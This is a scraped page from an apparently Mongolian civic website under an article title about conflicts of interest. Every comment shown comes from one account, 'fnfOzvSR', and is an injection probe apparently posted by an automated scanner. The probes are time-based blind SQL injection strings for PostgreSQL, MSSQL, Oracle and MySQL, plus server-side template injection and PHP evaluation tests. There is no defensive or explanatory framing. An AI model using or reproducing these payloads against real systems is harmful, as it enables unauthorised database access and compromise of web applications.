• Нүүр хуудас
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

АШИГ СОНИРХЛЫН ЗӨРЧЛИЙН ТАЛААР ТА ХЭР МЭДЭХ ВЭ?

АШИГ СОНИРХЛЫН ЗӨРЧЛИЙН ТАЛААР ТА ХЭР МЭДЭХ ВЭ?
fnfOzvSR 555
2023-03-02 Хариулах
fnfOzvSR 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2023-03-02 Хариулах
fnfOzvSR -1)) OR 209=(SELECT 209 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
fnfOzvSR -5) OR 271=(SELECT 271 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
fnfOzvSR YpfhB8nR'; waitfor delay '0:0:15' --
2023-03-02 Хариулах
fnfOzvSR -5 OR 293=(SELECT 293 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
fnfOzvSR 1 waitfor delay '0:0:15' --
2023-03-02 Хариулах
fnfOzvSR (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
2023-03-02 Хариулах
fnfOzvSR -1 OR 3+327-327-1=0+0+0+1
2023-03-02 Хариулах
fnfOzvSR 1/1
2023-03-02 Хариулах
fnfOzvSR (316-310-5)
2023-03-02 Хариулах
fnfOzvSR 1*1
2023-03-02 Хариулах
fnfOzvSR '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2023-03-02 Хариулах
fnfOzvSR 1*1
2023-03-02 Хариулах
fnfOzvSR 1
2023-03-02 Хариулах
fnfOzvSR 1
2023-03-02 Хариулах
fnfOzvSR -1)) OR 715=(SELECT 715 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
fnfOzvSR 4VAnntNk'; waitfor delay '0:0:15' --
2023-03-02 Хариулах
fnfOzvSR dfb[[${98991*97996}]]xca
2023-03-02 Хариулах
fnfOzvSR 1 waitfor delay '0:0:15' --
2023-03-02 Хариулах
fnfOzvSR dfb{{98991*97996}}xca
2023-03-02 Хариулах
fnfOzvSR #{98991*97996*98991*97996}
2023-03-02 Хариулах
fnfOzvSR -1); waitfor delay '0:0:15' --
2023-03-02 Хариулах
fnfOzvSR dfb#{xca}=123
2023-03-02 Хариулах
fnfOzvSR dfb{{'abcd'.toUpperCase()}}xca
2023-03-02 Хариулах
fnfOzvSR dfb{@math key=98991 method="multiply" operand=97996/}xca
2023-03-02 Хариулах
fnfOzvSR dfb{{{this}}}xca
2023-03-02 Хариулах
fnfOzvSR print("dfb" . 98991*97996 . "xca");
2023-03-02 Хариулах
fnfOzvSR dfb{#98991*97996}xca
2023-03-02 Хариулах
fnfOzvSR 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
2023-03-02 Хариулах